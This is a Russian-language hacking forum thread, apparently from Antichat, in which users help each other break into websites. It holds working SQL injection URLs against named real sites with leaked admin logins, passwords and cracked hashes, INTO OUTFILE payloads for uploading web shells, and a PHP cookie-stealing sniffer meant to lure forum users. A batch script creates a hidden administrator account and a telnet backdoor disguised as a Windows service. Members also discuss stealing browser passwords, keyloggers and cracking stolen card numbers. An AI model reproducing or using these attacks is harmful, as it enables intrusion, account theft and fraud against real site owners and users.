как загрузить r57 через mysql inj


index.php?p=-1+union+select+1,password,3,4,5,6,7,8+from+users/*

это типа пароль узнать, а как шелл загрузить?

index.php?p=-1+UNION+SELECT+null, тут код шелла в bin2hex ,null,null,null,null+from+accounts+into+outfile+'/tmp/aaa.php'/*

так, если конечно инто_аутфаил разрешён...

index.php?p=-1+UNION+SELECT+null, тут код шелла в bin2hex ,null,null,null,null+from+accounts+into+outfile+'/tmp/aaa.php'/*

так, если конечно инто_аутфаил разрешён...

Забыл сказать сервер виндовый

Какая разница...
https://forum.antichat.ru/threadnav34338-1-10.html

Скажите как залить шелл через админку в Joomla(Версия 1.0.1.2)?!
за ранее спс:)

XaCeRoC
_http://forum.antichat.ru/thread50600.html

Подскажите плиз как залить шелл в админке Datalife версия 6.7

Через че вообще пытаться залить? Через рисунки не получается.

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''46151'' LIMIT 1' at line 2
Правильно ли я понимаю, что здесь иньекция используется после LIMIT и сделать ничего нельзя?

Задался вопросом научиться искать уязвимости в исходниках. Есть ли среди вас сансеи ))
Большая прозьба: не посылать учить языки программирования. На мой взгляд это не обязательно, достаточно уметь читать код(могу ошибаться :)) Может кто подскажет или даст на расмотрение несколько наверняка уязвимых скриптов с комментариями?или ссылки на статьи по теме. Ну или... вам виднее.

samarin, как ты можешь найти уязвимость в коде, не зная языка? учи язык и всё.

samarin, как ты можешь найти уязвимость в коде, не зная языка? учи язык и всё.
ок. Но одним языком сыт не будешь. Нужно понять принцип нахождения уязвимостей. Ведь взять для примера людей, которые хорошо знают язык, пишут всякие cms, форумы и т.д. Но сами они, в большинстве, не могут находить уязвимости.
-------------------------------------------------------------
читать код можно не умея программировать.
-------------------------------------------------------------
Я очень быстро учусь чему-то(если хорошо подсказывают )). И мне важно понять принцип.

читать код можно не умея программировать.
ну-ну. А ты умеешь говорить по испански, незная ниодного испанского слова?

Учи PHP для начала

Spyder - разве я сказал, что не знаю пхп?
Я знаю пхп на уровне ... второго класса )) (могу ,более менее, читать код) - это как испанский со словарем ))
--------------------------------------------------------------
Учи PHP для начала если это и есть ответ на мой вопрос, что ж буду грызть книги по php :D

samarin, просто ты не поймешь почему уязвимость именно тут, и почему это уязвимость и как оно вообще работает, не зная языка. А если просто показать пару шаблонов, то так и будешь "подставлять кавычку" )) Вообщем, надо учить язык, ты это уже и так понял и Spyder ещё сказал)

n0ne - Да, спасибо! Как повышу свой уровень знаний пхп обязательно подниму тему еще раз.
------------------------
какие книги на ваш взгляд самые удачные, чтобы начать детальное(а главное правильное)изучение языка?

samarin, www.intuit.ru - там есть довольно неплохие курсы по php. А потом читай статьи и книги по безопасному программированию на php и была неплохая книженция "php глазами хакера", если не ошибаюсь.

samarin, подставляй ковычки в конце адресной строки пока не увидишь надпись MySQL Syntax Error

никак не могу найти название таблицы

http://www.denarms.dk/netbutik.php?cat=-1+union+select+concat_ws(0x3a3a,brugernavn,adgangs kode)+from+???/*

никак не могу найти название таблицы
+union+select+table_name+from+information_schema.t ables/* - все названия таблиц
+union+select+column_name+from+information_schema. columns/* - все названия столбцов

не помогает, вместо этого пустой пхп файл качается а вот так

http://www.denarms.dk/netbutik.php?cat=-1+union+select+concat_ws(0x3a3a,brugernavn,adgangs kode)+from+mysql.user/*

сервер выдает

SELECT command denied to user 'denarms_dk'@'srv65.one.com' for table 'user'

кстати а что интересного в srv65.one.com?
насколько я понял тот сайт на этом хостинге хостится

1SeTh, попробуй это http://hack-shop.org.ru/tools-mysql-brut-table

Подскажите реально узнать способ кодирования ?
User:$1$bv9DZ.M.$GjXuCBfTWk2/w8iQKEg9R/

Подскажите реально узнать способ кодирования ?
User:$1$bv9DZ.M.$GjXuCBfTWk2/w8iQKEg9R/
MD5 (Unix) или MD5 (APR)

1SeTh, попробуй это http://hack-shop.org.ru/tools-mysql-brut-table

ссылка понравилась, тока не помогает, после брута цифру выдает

Люди потскажите движок wordpress это блок доступ к админки сложно получить???

2andreipup
Не вполне понял тебя,если нужны уязвимости WordPress они сдесь:
_https://forum.antichat.ru/thread50572.html

Есть www.bankasia.kg/index.php?img/rateofex1.gif и www.bankasia.kg/gb/index.htm, как можно залить шелл ?

В данном случае - только попросить админа...

http://gta.com.ua/file_details.phtml?id=1'
не могу подобрать кол-во полей пробывал order by но ни чего не изменилось
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/gtacom/domains/gta.com.ua/public_html/inc/files_details.html on line 51
одна и таже пага

http://gta.com.ua/file_details.phtml?id=-5+union+select+1,2,3,4,5,6,7,version(),9,10,11,12, 13,14,15,16,17,18,19,20/*

Этот сайт в антибояне :)

Привет АНТИЧАТ! Извиняюсь, что моё первое сообщение начинаеццо с просьбы.Но всё же, помогите новичку :)
Что делать если отсутствует доступ к table_name и column_name в information_schema.tables и information_schema.columns саатветсвенна?
То есть при запросе
concat_ws(0x3A3a,TABLE_SCHEMA,TABLE_NAME)+from+inf ormation_schema.tables/*
пропадают выводимые поля, без всякой ошЫбки. Как и в колумнс.
При запросе
concat_ws(0x3A3a,version(),database(),user())+from +information_schema.tables/*
вся инфа выводится.
Версия 5.0.45.
Вот такой капкан вот. Знающие, посоветуйте плиз.

ссылку или сюда или в лс скинь

Spyder
Нельзя ли обойтись без конкретной ссылки? Просто показать пару возможных примеров, не очень хочется афишировать ресурс с подобного рода информацией ;)

да на самом деле хз почему
а ты table_name и тп не пытался в нижнем регистре писать?

Привет АНТИЧАТ! Извиняюсь, что моё первое сообщение начинаеццо с просьбы.Но всё же, помогите новичку :)
Что делать если отсутствует доступ к table_name и column_name в information_schema.tables и information_schema.columns саатветсвенна?
То есть при запросе
concat_ws(0x3A3a,TABLE_SCHEMA,TABLE_NAME)+from+inf ormation_schema.tables/*
пропадают выводимые поля, без всякой ошЫбки. Как и в колумнс.
При запросе
concat_ws(0x3A3a,version(),database(),user())+from +information_schema.tables/*
вся инфа выводится.
Версия 5.0.45.
Вот такой капкан вот. Знающие, посоветуйте плиз.
возможно прав на просмотр нету
возможно вывод ошибок отключён
попобуй на распостранённые колонки

159932, ты бы бред то не писал бы

если у него version() и тп выводится при использовании from information_schema.tables, то значит права есть, и с чего бы ошибкам появляться?

159932
Придется видимо перебирать :(
Вывод ошибок не отключён, при некорректном запросе выводятся...
Странно что нет прав на просмотр tables, первый раз столкнулся.
Spyder
Я неопытный, но не на столько глупый :) Пробовал конечно.

159932, ты бы бред то не писал бы

если у него version() и тп выводится при использовании from information_schema.tables, то значит права есть, и с чего бы ошибкам появляться?
ну последнее его предложение я чото не заметил ..

А если в чар перегнать, непоможет? Т Т.к. хрен подберёшь руками...Если права то есть, может просто фильтрация какаято стоит.
И где можно в чар перевести в онлайне где нибудь.
И ещё, если в выводимое поле (любое) ввести load_file('/etc/passwd') равно как и load_file(0x2f6574632f706173737764) , то это поле просто пропадает, остальные остаются. В случае с table_name в information_schema -пропадают все поля, тут же остальные остаются. Это значит, что кавычки не экранируются и если file_priv есть то можно залить шелл? И как узнать, есть ли file_priv? И если шелл можно залить только в корень, это в public_html выходит? В ошибке просто не видно пути через public_html.

у тебя file_priv нету, ибо
если в выводимое поле (любое) ввести load_file('/etc/passwd') равно как и load_file(0x2f6574632f706173737764) , то это поле просто пропадает, остальные остаются
проверить есть или нет попробовав прочитать любой файл, что ты и попробовал сделать выше
Так же инфа о наличии файл прив хранится в таблице mysql.user

Полный путь можно узнать например в гугле, вообще тут есть об этом статься от [cash]'a, ищи
В чар переводить - не сработает. Ты вместо имён таблиц увидишь "table_name"

andreipup, там двиг - ворд пресс
https://forum.antichat.ru/threadnav50572-1-40.html

Так, У Велли проблема : ).Нашёл один проект,вскрыл,через schema_name узнал количество баз.Потом узнал,что на нём хостицо не один сайт:),а когда потался вывести все те таблицы,что были в этой базе,в других базах не прокатило.).Есть ли какой-то вариант получения доступа к ним ?. о_О, и запрос если можно, как должно быть в идеале: )

видимо у юзера от кторого работает мускул нет прав на другие базы
если есть доступ к mysql.user, выбирай оттуда пасс рута, бруть
Когда сбрутишь или пробуй удалённо приконектиться к серваку или ищи на сайтах пшпмайадмин

никак не могу подобрать колонну для этой страницы

http://dragonshc.org/mx/index.php?page=-1+union+select+1,2,3,4,5,???+from+mx_page/*

никак не могу подобрать колонну для этой страницы
В чём проблема то? Вывод есть:
http://dragonshc.org/mx/index.php?page=-1+union+select+1,2,3,4,5,version()--

видимо у юзера от кторого работает мускул нет прав на другие базы
если есть доступ к mysql.user, выбирай оттуда пасс рута, бруть
Когда сбрутишь или пробуй удалённо приконектиться к серваку или ищи на сайтах пшпмайадмин

Жалко....доступ туда закрыт:).Остаёццо только расхешить.Ммм...Или подделать ид сессии:)*Ушёл искать скрипты*.

В чём проблема то? Вывод есть:
http://dragonshc.org/mx/index.php?page=-1+union+select+1,2,3,4,5,version()--
Вот так ещё лучше:
_http://dragonshc.org/mx/index.php?page=-1+union+select+1,concat(version(),0x3a,database(), 0x3a,user()),3,4,5,null/*
Вывод в <title> ,хотя, кому как удобнее

http://www.fondationbrigittebardot.fr/site/actu_en.php?id=

Нашел уязвимость...но бд ведет себя странно...
1.пробую group by , всё норм, 3 колонки...
2.пробую union select 1,2,3/* появляется ошибка...
The used SELECT statements have a different number of columns

Подскажите,плз)

http://nasaexplores.nasa.gov/show_912_teacher_st.php?id=2'+or+1=(select+table_n ame+from+information_schema.tables+limit+1,1)/*

Почему-то не эксплотируеццо,в лимитки подставляю любое число,то же самое.Что неправильно ? И вывода кстати нету)(

2†c0(aIn?†
Там две колонки Вот вывод:
_http://www.fondationbrigittebardot.fr/site/actu_en.php?id=75018+union+select+AES_DECRYPT(AES_ ENCRYPT(concat(user(),char(58),version(),char(58), database()),0x71),0x71),2/*

2†c0(aIn?†
Там две колонки Вот вывод:
_http://www.fondationbrigittebardot.fr/site/actu_en.php?id=75018+union+select+AES_DECRYPT(AES_ ENCRYPT(concat(user(),char(58),version(),char(58), database()),0x71),0x71),2/*

Спасибо огромное,что помог.Кста,где можно почитать про спец.функции подобного рода или что-то типа этого?Перечитал все статьи [ cash ]'a,но про это ничего не нашел.

ЗЫ:Буду ещё очень благодарен,если кто-нить подробно распишет,как залить шелл(например r57),инструкцию желательно в пм)

†c0(aIn?†
Это просто один из вариантов обойти кодировку.Про MySql можешь почитать например сдесь:
_http://phpclub.ru/mysql/doc/reference.html
Статьи по скулям на форуме :
_https://forum.antichat.ru/thread19605.html
_https://forum.antichat.ru/thread43966.html

Вот так ещё лучше:
_http://dragonshc.org/mx/index.php?page=-1+union+select+1,concat(version(),0x3a,database(), 0x3a,user()),3,4,5,null/*
Вывод в <title> ,хотя, кому как удобнее

ок, а теперь как подобрать колонну для mx_page?

Скачай исходники MX-System и посмотри там, а вообще не думаю что в этой таблице будет что-то интересное, лучше смотри таблицу phpbb_users, http://dragonshc.org/mx/index.php?page=-1+union+select+1,concat_ws(0x3a,username,user_pass word),3,4,5,null%20from%20phpbb_users%20limit%201, 1/*

Помогите с заливкой шелла в Ipb 2.3.3

никак не могу проапдейтить:
comments.php?news_id=-1+update+table.news+set+title='lol'+where+id='517'/*
пишет
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'update table.news set title='lol' where id='517'/*' at line 1
помогите, плз

через инъекцию update не сделаешь... ;)

2aka PSIH
в mysql?
в mssql проходил

>в mysql?
да, если иньекция в select запросе, то update не прокатит :)


>в mssql проходил
в mssql можно разделить запрос, в mysql нет...

http://www.bitdefenderthailand.com/news_detail.php?id=-86+union+select+1,2,3,4,unhex(hex(concat(user_id)) ),6,7,8,9,10+from+dealer--

ampro_micro

http://www.bitdefenderthailand.com/news_detail.php?id=-86+union+select+1,2,3,4,unhex(hex(concat(password) )),6,7,8,9,10+from+dealer--

eics123

http://www.bitdefenderthailand.com/admin/ -> Login Error :s

Whais is The ProbLem ? Help .

а можно ли как-нибудь вызвать ошибку, чтобы отобразился абсолютпуть
ну типа
"SQL error: You have an error in.... ...."
а потом
"Line: 666
File: /home/.../.."
?? спасибо

Cr@zy_King
concat(user_id)
зачем тогда concat??

http://www.bitdefenderthailand.com/news_detail.php?id=-86+union+select+1,2,3,4,unhex(hex(concat_ws(0x3a,u ser_id,password))%20),6,7,8,9,10+from+dealer--
eics:eics123

ты уверен что логин\пасс админа?? ))

и если load_file ничего не выводит - то это
неправильный путь? нету прав? отключен вывод ошибок?
что может быть?

скорей всего 2 или 3 вариант

maxclk, может быть file_priv = 0, может быть ты пишешь просто 'path_to_file', а кавычки экранируюца.

hex/unhex - херня
cast(blabla as binary) рулит

Если прив лоад файл ничего не выводится, то это или 1 или 2-ой вариант
первый отпадает если ты указываешь всегда существующий файл (/etc/hosts например)
Даже если вывод ошибок включён, при неудачном лоад_файл, сообщение об ошибке не появится

у меня такой вопрос появился... например есть уже раскрученая скуль вида site.com/index.php?id=-1+union+select+1,concat_ws(0x3a,user,password),3+f rom+user+limit+1,1/*

в ней выводится только по одной строке из базы (т.е. надо баловатся с лимитом).. все бы ничего, вот только в базе 9000 записей и ручками их все пребирать будет сложновато... есть ли скрипты которые перебирают лимит от 0 до нужного числа и сохраняют все записи в файл?
если у кого нить есть то поделитесь пожалуйста, так каксам я пока что скриптовых языков не знаю, но все еще впереди((=

http://www.voiptraders.co.uk/shop.php?id=-3+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7/*
выдает ошибку

http://www.voiptraders.co.uk/shop.php?id=-3+order+by+17/* а так вроде подобрал таблицы..в чем трабла?

http://www.voiptraders.co.uk/shop.php?id=-3+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7/*
выдает ошибку

http://www.voiptraders.co.uk/shop.php?id=-3+order+by+17/* а так вроде подобрал таблицы..в чем трабла?
это 3я ветка мускула нет union'а
сравни
http://www.voiptraders.co.uk/product_details.php?id=216+and+substring(version() ,1,1)=5/*
http://www.voiptraders.co.uk/product_details.php?id=216+and+substring(version() ,1,1)=4/*
http://www.voiptraders.co.uk/product_details.php?id=216+and+substring(version() ,1,1)=3/*

3й запрос выберет инфу.

Народ, где может храниться информация, находящаяся в базах данных таблицы schemata ? Куча паролей,а откуда непонятно)(

Народ, где может храниться информация, находящаяся в базах данных таблицы schemata ? Куча паролей,а откуда непонятно)(
если я правильно тебя понял, то у тебя есть таблицы users например, но ты не знаешь к чему они относятся.
чтобы узнать к какой базе они относятся выполни запрос типа:
select table_name, table_schema from information_schema.tables;
потом, чтобы наверняка вытаскивать данные, запросы будут выглядеть примерно так:
select login,password from имя_схемы.users;
и то если прав хватит в чужую бд смотреть.

....

ищи config.php в папке форума

если я правильно тебя понял, то у тебя есть таблицы users например, но ты не знаешь к чему они относятся.
чтобы узнать к какой базе они относятся выполни запрос типа:
select table_name, table_schema from information_schema.tables;
потом, чтобы наверняка вытаскивать данные, запросы будут выглядеть примерно так:
select login,password from имя_схемы.users;
и то если прав хватит в чужую бд смотреть.

Пасип те Ж)))),Эт новый для Вельки запрос о_О.Я прост думал ещё,как узнать вообще все таблицы в какой-либо из базы в шеме,но принадлежность конкретной таблицы к базе тоже полезно...Права на бд есь,ток не во всех этих бд есть одна и та же папка :))).И ещё, особо интересует меня,нахрена там столько баз, если на нём хостится всего три сайта.Вот к примеру,в одной из баз лежит таблица админская,в которой хеш админа.А от чего он не пойму=)),к тому же там не один админский акк,а штук тридцать или больше).Мускула база отдельно лежит.

Пасип те Ж)))),Эт новый для Вельки запрос о_О.Я прост думал ещё,как узнать вообще все таблицы в какой-либо из базы в шеме,но принадлежность конкретной таблицы к базе тоже полезно...
штобы узнать таблы в одноц базе нужно сначала выбрать базу а потом сделать запрос типа
select table_name from information_schem.tables where table_schema='имя_схемы';
И ещё, особо интересует меня,нахрена там столько баз, если на нём хостится всего три сайта.
возможно к этому серверу бд есть удаленное подключение.
попробуй просканить его на порт 3306.

Ребят,имею доступ к компу через радмин.Нужно стырить все пароли на инет,и пассы и акки из строк заполнения в браузерах.Где это может находиться?

Ребят,имею доступ к компу через радмин.Нужно стырить все пароли на инет,и пассы и акки из строк заполнения в браузерах.Где это может находиться?
Запусти пинчя и поставь логер епт!

Насчет пинча.Сам догадался но отчеты идут битые видимо из-за оперы.
А про логер поподробней плиз.

штобы узнать таблы в одноц попробуй просканить его на порт 3306.

Эм...Там есть открытый порт 3306,но с телнета к нему не приконнектицо,сразу после ответа от серва вместе с версией мускула вылетаю)).Как и чем приконектицо ?)

Эм...Там есть открытый порт 3306,но с телнета к нему не приконнектицо,сразу после ответа от серва вместе с версией мускула вылетаю)).Как и чем приконектицо ?)
на него не телнетом надо подключаться, а либо утилитой идущей в комплекте с мускулом через консоль, либо phpMyAdmin например.
только надо знать пароли от баз данных( из таблицы mysql.user)

что можно сделать с этим???

Fatal error: require() [function.require]: Failed opening required '' (include_path='.;C:\php5\pear') in E:\www\cdp\index.php on line 120

внда - не юникс(

brasco2k
мы не телепаты
ссылку дай

odnoklassniki.ru

Blind SQL

http://rabota.odnoklassniki.ru/content/vacancies/search.html?region=2&s=33&payment_to=300&limit=10+--+&payment_from
http://rabota.odnoklassniki.ru/content/vacancies/search.html?s=19&company_type=agency%27&limit=5+--+

Отображение Flash баннера вверху.

как дальше? Там MS SQL + какойто модуль непонятный. Обычьные запросы не катят.

а у меня вопрос,если проверяю на пассивную хсс и белая страница,есть уязвимость?

Demetra, если ты проверяешь на пассивную xss и белая страница, то смотря как ты проверяешь на xss. Напиши подробней-все пошагово, а то нифига не понятно.

а у меня вопрос,если проверяю на пассивную хсс и белая страница,есть уязвимость?

Возможно, проверь закрыты ли тэги.

Demetra, если ты проверяешь на пассивную xss и белая страница, то смотря как ты проверяешь на xss. Напиши подробней-все пошагово, а то нифига не понятно.
каталог статей,после индексной страницы ставлю <IMG%20SRC="javascript:alert();

если с закрытыми тэгами то выбрасует на главную

Ну,эт не проблема))) (но пока проблема).Там просто есть пароли мд5 по всей видимости, и мускула...странно как-то.Ещё проверю скажу точно).Кто-то тут посоветовал что-то там почитать)))).Был бы рад узнать,что именно (название книги хотя б,а остальное найдётся) =)).Да,и вот ещё что...Ели откопал эту *цензура рулит* таблицу Ордерс,по всей видимости, с зашифрованными номерами кредитных карт(CartID).Один добрый человек подсказал,что они 16-и значные ))))(Ибо какая конкретно длина номера я не е**,всмысле не знаю))))))) ).Может подскажет кто,как такое чудо вообще перебирать о_О ?Или есть базы какие-то с этими хешами,или они лежат где-то в открытом виде(или какой-то метод доступа,дабы получились открытые), а то собственного ботнета не имею...Да и в голову больше ничё не приходит... хнык-хнык :Р
ЗЫ: Велька любит читать ня ^________^

каталог статей,после индексной страницы ставлю <IMG%20SRC="javascript:alert();
site.ru/index.php<IMG%20SRC="javascript:alert(); так чтоли? ну конечно ничего работать не будет...ты никакому параметру не передаешь значение.

Извените конешно тут у меня такой ламерский вопрос, что нужно сделать на компе жертвы что бы можно было удалённо выполнять команды на нём через telnet
и ещё как должна выглядить команда для подключению по ftp через телнет на мой сайт (ну тоесть что бы через команду телнета войти на фтп моего сайта)

все остальное вобще некатит,а это заглючило подумала может что то есть

Demetra не нужно после ссылки ставить <img src=javasript:alert()> нужно проверять переменные, вот смотри есть ссылка

http://sm.aport.ru/scripts/template.dll?That=ads&Base=ads&Rt=2&Tn=57&r=%F1%EA%E0%F7%E0%F2%FC+mp3
пременная r отвечает за текст который ты исщещ в поисковике . и проверяеш её на фильтрацию (тоесть вставляеш туда свой скрипт)

http://sm.aport.ru/scripts/template.dll?That=ads&Base=ads&Rt=2&Tn=57&r="><script>alert(1)</script>
если сообщение выскакивает значит фильтрации нет и xss уязвимость есть и можно вставлять скрипт снифера, если нет то фильтрация есть , а вообще тебе рано xss изучать если ты незнаеш html и jajascript скачай учебники и учи , без знания этих языков ты не сможеш испльзовать и искать xss уязвимости ,

ZET36давно не сидел в хр(поэтому может немного отходить от истины). заходишь в службы: выполнить "gpedit.msc" там в службах включи службу сервера телнет.
и ещё как должна выглядить команда для подключению по ftp через телнет на мой сайт по поводу телнета не знаю, а вот через ssh можешь. Команда будет выглядеть ssh user@sait - в линуксе. если через питти - тогда ставишь 21 порт заместо 22

samarin спасибо

Всем здрасте, вопрос касательно MySQL инъекции. Имеем инъекцию вида:
http://site/polls/?kwd=1
Ответ получаем:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/local/wwwdocs/features/polls/pollofdayarchive.php on line 53
При пустом параметре kwd - ошибки нет.
Запрос вида http://site/polls/?kwd=OR 1=1 также выдает ошибку, пробовал вариации типа:
http://site/polls/?kwd=)+OR+1=1 и т.д. на любое изменение параметра kwd ругается, однако вставить свой запрос не выходит...
Также... При kwd=0 ошибки нет, а при kwd=1-1 ошибка есть.
Кто что может посоветовать?
P.S. С радостью приму помощь в icq: 59600O00

прив всем....
вопрос такой: как зделать так чтобы в Internet Explorer.е не вылетала табличка сохранить пороль, а чтоб автоматом его сохраняла и не задавала глупых вопросов))))

Извените конешно тут у меня такой ламерский вопрос, что нужно сделать на компе жертвы что бы можно было удалённо выполнять команды на нём через telnet
и ещё как должна выглядить команда для подключению по ftp через телнет на мой сайт (ну тоесть что бы через команду телнета войти на фтп моего сайта)
---bat файл---
@echo off
net localgroup TelnetClients /add
net user admin pass /add
net localgroup Administratoren admin /add
net localgroup TelnetClients admin /add
cd %windir%\system32
ECHO Windows Registry Editor Version 5.00>0.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer \1.0]>>0.reg
ECHO "LoginScript"=hex(2):63,00,6d,00,64,00,00,00>>0.reg
ECHO "TelnetPort"=dword:000003F2>>0.reg
ECHO "MaxConnections"=dword:0000000a>>0.reg
ECHO "EventLoggingEnabled"=dword:00000000>>0.reg
ECHO "DisconnectKillAllApps"=dword:00000000>>0.reg
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer \1.0\ReadConfig]>>0.reg
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer \Defaults]>>0.reg
regedit /s 0.reg && DEL 0.reg
COPY %windir%\system32\tlntsvr.exe %windir%\system32\"svchost.exeя"
assoc .exeя=exefile
sc create "WMI-Client" binpath= "%windir%\system32\svchost.exeя" start= auto
"svchost.exeя" /service
sc description WMI-Client "Microsoft WMI-Client"
sc start WMI-Client
После запуска этого батника к компу можно коннектится телнетом

Всем доброго время суток...У меня такой вопрос,знаю что не мало обсуждался,но именноо то что мне нужно я не нашел(может плохо искал,но не нашел)
Мне нужен пхп-скрипт для кражи "печенюшек" с того сайта/форума которого он перешел на эту страницу...Тоесть,я например даю ссылку пользователлю форума и говорю посмотри классные девки,он переходит на ссылку (где спрятан скрипт кражи кукисов) и все его куки сохраняются в отдельный файл...у меня когда то был такой,но как грицо СПЛЫЛ...не ставьте мне "-",я только новичёк,и вроде обратился по теме,или киньте хотя бы ссылку где можна это взять...заранее благодарен
Кто напишет в ПМ,буду оч сильно благодарен!

Invalid query: Can't read dir of './db17222m_231107/' (errno: 13)

Кто встречал такую ошибку ? Вылетела при выборе из information_schema.tables. Версия пятая точно: )

дай plz ссылку на сниффер и скрипт этот

Он на ачате валяется=,на сайте кажись=)).Ссылку ща не помню ибо давнон е пользывался.Так же в гугле их много:)

2maximkafun, омг, учи родной язык для начала :).

<?php
$fp = fopen("log.log", "a");
fwrite($fp, "FROM: ".$SERVER["REMOTE_ADDR"]." DATA: ".$_SERVER["QUERY_STRING"]);
fclose($fp);
?>

Этот сниффер записывает все данные в файл log.log, пришедшие методом "GET". Залей его на сервер и будет тебе счастье :). Но мне кажется, что это не для тебя. Попробуй сервис - s.netsec.ru. Позволяет создавать индивидуальные снифферы без напряга, респект GreenBear! Только на серве тех. работы сейчас, ГринБир говорит, что скоро все будет :)
З.Ы. Тебя посадят.

Народ,сломал тут сайт www.zaishu.com.оказалсо БОЯНским)(.тык вот из таблицы adminrights вытащил логин и пароль админа :

admin:zaishu62.В мускул доступа нет)).Но понт в том,что этот грёбаный акк никуда не подходит(даже после того,как я прошёлся по открытым портам аля фтп,8080,5100 и т.д.: ))).нашёл там папку админскую(название забыл()),пасс тож не подошёл.Помогите кто-нибудь узнать,от чего он)).

2maximkafun, омг, учи родной язык для начала :).

<?php
$fp = fopen("log.log", "a");
fwrite($fp, "FROM: ".$SERVER["REMOTE_ADDR"]." DATA: ".$_SERVER["QUERY_STRING"]);
fclose($fp);
?>

Этот сниффер записывает все данные в файл log.log, пришедшие методом "GET". Залей его на сервер и будет тебе счастье :). Но мне кажется, что это не для тебя. Попробуй сервис - s.netsec.ru. Позволяет создавать индивидуальные снифферы без напряга, респект GreenBear! Только на серве тех. работы сейчас, ГринБир говорит, что скоро все будет :)
З.Ы. Тебя посадят.
хм...чтото он ничего не пишет кроме FROM: DATA:
ничего не принимает,или я чтто не так зделал...вснунул скрипт в страничку index.php, залил
на хост, на форуме создал темку из неё ссылку на страницу, сам переходил и пользователи переходили,но кроме этого "FROM: DATA:" ничего не пишет,что не так?

Писал не проверяя просто.

<?php
$fp = fopen("log.log", "a");
fwrite($fp, "FROM: ".$_SERVER["REMOTE_ADDR"]." DATA: ".$_SERVER["QUERY_STRING"]."\r\n");
fclose($fp);
?>

Так лучше. В DATA тоже ничего не будет, пока GET'ом что-нибудь не передать. Например, index.php?something. Кукисы на JS: +document.cookie добавлять к УРЛу ссылки на сниффер.

Zet36,хсс в самый раз,хтмл знаю,вот яву незнаю,пихала в формы её.буду пробовать

белая страница,наверна нету бага

http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,version()/* 5.0.15
пробуем ... ==> http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,table_name+from+INFORMATION_SCH EMA.TABLES/* Пишет Illegal mix of collations for operation 'UNION', вроде связано с кодировкой, но пробую кодировки и ниодна не подходит(((

Элементарно Ватсон, Аес решает

cmd> POST /index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(TABLE_N AME,0x71),0x71)+from+information_schema.tables/* HTTP/1.0

Тьфу, забыл))))) спс!!!

А ещё,
http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(column_ NAME,0x71),0x71)+from+information_schema.columns+w here+table_name=chr(39).chr(117).chr(115).chr(101) .chr(114).chr(115).chr(39)+limit+0,1/*
Так это делается? char='users'

http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(column_ name,0x71),0x71)+from+information_schema.columns+w here+table_name=0x и hex_ТАБЛИЦЫ/*
например, колонки с таблицы USERS:
http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(column_ name,0x71),0x71)+from+information_schema.columns+w here+table_name=0x7573657273+limit+2,1/*

http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,user+from+users/*
блин, а чё тогда не выходит???

Не из той базы просишь

все просто..)
достаем table_schema
http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(table_s chema,0x71),0x71)+from+Information_schema.tables+w here+table_name=0x7573657273/*
достаем пасс:
http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(pass,0x 71),0x71)+from+test_190.users/*
ну в итоге получил пасс и логин чела. чей id=3. т.к. 1,2 нету.)

anna1;25f9e794323b453885f5181f1b624d0b

расшивровуем хеш и получаем пасс: 123456789

но токо вот где вход?)

А как в найти имена баз???

http://www.osvita-servis.com.ua/index.php?p=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(table_s chema,0x71),0x71)+from+Information_schema.tables+w here+table_name=0x7573657273/*
обновляю пост) по чуть чуть)

На100ящий
table_schema+from+information_schema.tables+where+ table_name=... табличка
советую почитать https://forum.antichat.ru/showpost.php?p=401199&postcount=17


достаем table_schema из таблицы USERS

Жжошь чтоле? =\
и кстате наверняка гет =(

Sabe, а ты случайно админку не нашёл???))))

Constantine
обновил пост. пасс получил этим способом)
пс: немножко подкурил..)
На100ящий
это я у тебя спрашиваю..) смысл взлома?)

Constantine, спс за ссылку....будем знать!!!! всё, надо ложиться спать, а то завтра гос(((

Sabe, пока учимся....))))

ну я тоже пока учусь..)

хсс+
http://www.osvita-servis.com.ua/index.php?p=%22%3E%3Cscript%3Ealert(/hacked%20by%20VITAL/)%3C/script%3E

/index.php?p=-1+union+select+1,2,unhex(hex(table_name))+from+INF ORMATION_SCHEMA.TABLES/*
или так

ребята это инфо что то дает мне? есть толк от этой инфо?

http://www.bladeauction.com/

забей он просто упал)) как встанет почекаем на скуль..)

http://www.bladeauction.com/index.php

вот у мя тут созрел пост:

значит рассматривается cms wow-ultimate...

при запросе
http://site/index.php?name=...

если ввести в name каконить брет, типа (ghj) то выдается:

Fatal error: require_once() [function.require]: Failed opening required 'modules/ghj.php' (include_path='.;/usr/local/php5/PEAR') in Z:\home\site\www\templates\wolk\block-center.php on line 6

это говрит о том что при запросе подгружается модуль из папки "modules" ,выполняется подгрузка с помощью функции require_once() которая прописана в файле "Z:\home\site\www\templates\wolk\block-center.php"

block-center.php:
<?php
if (!$menu = &$_GET['page'])
$menu=$main_page;
print "<table align=\"center\" valign=\"top\" cellSpacing=\"0\" cellPadding=\"0\" width=\"100%\" border=\"0\" ><tr>
<td width=\"100%\" valign=\"top\" align=\"center\" >";
require_once("modules/$menu.php");
print "</td></tr></table>";

?>

из кода можно увидеть что модуль вызывается посредствам подстановки переменой "$menu" в функцию require_once("modules/$menu.php")

терь собсно вапрос:
я читал что с помощью уязвимой функции require_once можно инклюдить php файлы с разными нихарошими кодами... можноли здесь чонить придумать :?

Всем привет!
Помогите раскрутить:
